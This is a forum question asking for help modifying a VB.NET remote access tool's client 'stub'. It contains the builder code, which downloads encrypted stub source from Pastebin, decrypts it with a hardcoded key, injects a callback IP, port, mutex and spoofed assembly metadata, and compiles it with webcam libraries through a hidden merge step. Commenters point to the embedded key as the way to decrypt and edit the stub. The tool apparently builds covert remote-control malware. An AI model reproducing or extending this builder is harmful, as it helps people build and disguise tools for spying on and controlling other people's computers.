# How can I write decrypted text to a .txt file, add new code, then encrypt the text so that my program can still read it?

Tags: vb.net, encryption, remote-access, stub

I know, the title of this question is horrible, however, let me explain what I'm trying to achieve.

**Firstly, what does this program do?**

The program is a remote access tool which uses a ***stub*** to build the ***client*** which is currently on Pastebin: https://pastebin.com/raw/jFwk2aAL

Pretty much, when the user who operates the server, (where all clients are added if they open the file) to build the program they press a button which says "**Build**". When the "**Build**" button has been clicked, this code is put into action:

```
Try

            Dim dialog2 As New SaveFileDialog
            dialog2.Filter = "Executables | *.exe"
            dialog2.InitialDirectory = Application.StartupPath
            dialog2.Title = "Select a path where the stub will be saved..."
            If (dialog2.ShowDialog = DialogResult.OK) Then
                Me.TR_Compile = New Thread(New ParameterizedThreadStart(AddressOf Me.lam__10))
                Me.TR_Compile.Start(dialog2.FileName)
            End If
            dialog2 = Nothing
        End If
    Catch ex As Exception
        Me.StatusBarMain.Text = ex.Message

    End Try
```

Pretty much, this is where the server operator chooses where to save the file, being the stub (the file the client will open to appear on the server.)

Once the stub's location has been saved, this code is put into action:

```
Private Sub Compile(ByVal path As String)
    Try
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {"Initializing Build..."})
        Dim source As String = Conversions.ToString(FormMain.RijndaelDecrypt(New WebClient().DownloadString("https://pastebin.com/raw/jFwk2aAL"), "308c036ab4ae32ff202d417d1e15cb667326201f4754644509b9079a81")).Replace("127.0.0.1", Me.tb_ip.Text).Replace("4432", Conversions.ToString(Me.nud_port.Value)).Replace("CLIENTID", Me.tb_clientid.Text).Replace("Single_Mutex_App_Instance", Me.TB_Mutex.Text).Replace("ASSEMBLYTITLE", Me.tb_assemblytitle.Text).Replace("ASSEMBLYDESCRIPTION", Me.tb_assemblydescription.Text).Replace("ASSEMBLYCOMPANY", Me.tb_assemblycompany.Text).Replace("ASSEMBLYPRODUCT", Me.tb_assemblyproduct.Text).Replace("ASSEMBLYCOPYRIGHT", Me.tb_assemblycopyright.Text).Replace("ASSEMBLYTRADEMARK", Me.tb_assemblytrademark.Text).Replace("3.5.2.4", String.Format("{0}.{1}.{2}.{3}", New Object() {Me.NumericUpDown9.Value, Me.NumericUpDown2.Value, Me.NumericUpDown3.Value, Me.NumericUpDown4.Value})).Replace("0.0.0.0", String.Format("{0}.{1}.{2}.{3}", New Object() {Me.NumericUpDown8.Value, Me.NumericUpDown7.Value, Me.NumericUpDown6.Value, Me.NumericUpDown5.Value})).Replace("L$01", Conversions.ToString(Me.CheckBox1.Checked)).Replace("L$02", Conversions.ToString(Me.RadioButton1.Checked)).Replace("L$03", Conversions.ToString(Me.RadioButton2.Checked)).Replace("L$04", Conversions.ToString(Me.RadioButton3.Checked)).Replace("L$05", Me.TextBox1.Text).Replace("L$06", Conversions.ToString(Interaction.IIf((Strings.Right(Me.TextBox2.Text, 4) = ".exe"), Me.TextBox2.Text, (Me.TextBox2.Text & ".exe")))).Replace("L$07", Conversions.ToString(Me.CheckBox2.Checked)).Replace("L$08", Conversions.ToString(Interaction.IIf((Strings.Right(Me.TextBox3.Text, 1) = "\"), Me.TextBox3.Text, (Me.TextBox3.Text & "\")))).Replace("L$09", Conversions.ToString(Me.CheckBox6.Checked)).Replace("L$10", Conversions.ToString(Me.CheckBox3.Checked)).Replace("L$11", Conversions.ToString(Me.CheckBox5.Checked)).Replace("L$12", Conversions.ToString(Me.CheckBox7.Checked)).Replace("L$13", Conversions.ToString(Convert.ToInt32(Me.NumericUpDown1.Value)))
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {"Writing parameter to stub..."})
        Dim compiler As ICodeCompiler = New VBCodeProvider().CreateCompiler
        Dim options As New CompilerParameters
        options.ReferencedAssemblies.Add("System.dll")
        options.ReferencedAssemblies.Add("System.Windows.Forms.dll")
        options.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
        options.ReferencedAssemblies.Add("System.Management.dll")
        options.ReferencedAssemblies.Add("System.Drawing.dll")
        options.ReferencedAssemblies.Add("System.ServiceProcess.dll")
        options.ReferencedAssemblies.Add("AForge.dll")
        options.ReferencedAssemblies.Add("AForge.Controls.dll")
        options.ReferencedAssemblies.Add("AForge.Video.DirectShow.dll")
        options.ReferencedAssemblies.Add("AForge.Video.dll")
        options.GenerateExecutable = True
        options.OutputAssembly = path
        options.CompilerOptions = "/target:winexe /platform:x86 /optimize+ /filealign:512"
        Dim parameters2 As CompilerParameters = options
        parameters2.CompilerOptions = Conversions.ToString(Operators.AddObject(parameters2.CompilerOptions, Interaction.IIf(Operators.ConditionalCompareObjectEqual(Me.PictureBox1.Tag, "", False), "", Operators.ConcatenateObject(" /win32icon:", Me.PictureBox1.Tag))))
        Dim results As CompilerResults = compiler.CompileAssemblyFromSource(options, source)
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {"Stub builded..."})
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {"Merging Assemblies..."})
        Dim startInfo As New ProcessStartInfo("ILMerge.exe")
        startInfo.Arguments = String.Concat(New String() {"/target:winexe /out:""", path, """ """, path, """ AForge.Controls.dll AForge.dll AForge.Video.DirectShow.dll AForge.Video.dll"})
        startInfo.WindowStyle = ProcessWindowStyle.Hidden
        Process.Start(startInfo)
        Thread.Sleep(&HBB8)
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {"Finished build !"})
        File.Delete(path.Replace(".exe", ".pdb"))
    Catch exception1 As Exception
        ProjectData.SetProjectError(exception1)
        Dim exception As Exception = exception1
        Me.Invoke(New DelegateAddOutput(AddressOf Me.AddOutput), New Object() {exception.Message})
        ProjectData.ClearProjectError()
    End Try
End Sub
```

In the "**Compile**" sub, the program downloads a paste made on pastebin which contains some encrypted characters. Then, the program uses this function:

```
 Public Shared Function RijndaelDecrypt(ByVal UDecryptU As String, ByVal UKeyU As String) As Object
    Dim managed As New RijndaelManaged
    Dim salt As Byte() = New Byte() {1, 2, 3, 4, 5, 6, 7, 8}
    Dim bytes As New Rfc2898DeriveBytes(UKeyU, salt)
    managed.Key = bytes.GetBytes(managed.Key.Length)
    managed.IV = bytes.GetBytes(managed.IV.Length)
    Dim stream2 As New MemoryStream
    Dim stream As New CryptoStream(stream2, managed.CreateDecryptor, CryptoStreamMode.Write)
    Try
        Dim buffer As Byte() = Convert.FromBase64String(UDecryptU)
        stream.Write(buffer, 0, buffer.Length)
        stream.Close()
        UDecryptU = Encoding.UTF8.GetString(stream2.ToArray)
    Catch exception1 As Exception

    End Try
    Return UDecryptU
End Function
```

to decrypt the text which is held on pastebin. It works great, however, I want to add my own functions to the stub, but, I can't, because the text is encrypted. So...

**How can I decrypt this text, edit it myself, then, encrypt it again, upload it to a different paste on pastebin, but all being that my program can decrypt the text and write it too the stub successfully?**

PLEASE COMMENT BELOW IF SOMETHING ISN'T CLEAR TO YOU.

> Edit: Changed some text to make this question make sense more.

Comment: Do you have the key? If so, just use the `RijndaelDecrypt` method from the code and a similar one for re-encryption.

Comment: Wouldn't "308c036ab4ae32ff202d417d1e15cb667326201f4754644509b9079a81" be the key? @NicoSchertler

Comment: Ah yes, right. Didn't look that deeply into the code.

Comment: All good. Maybe I could use a website to make it easier? Do you have any that you know of? @NicoSchertler

Comment: No, not really. Sorry. Btw, asking for off-site resources is off-topic here. The easiest way is to write a small desktop application that does this for you using the code that you already have. This way you can be sure that it matches the specifications.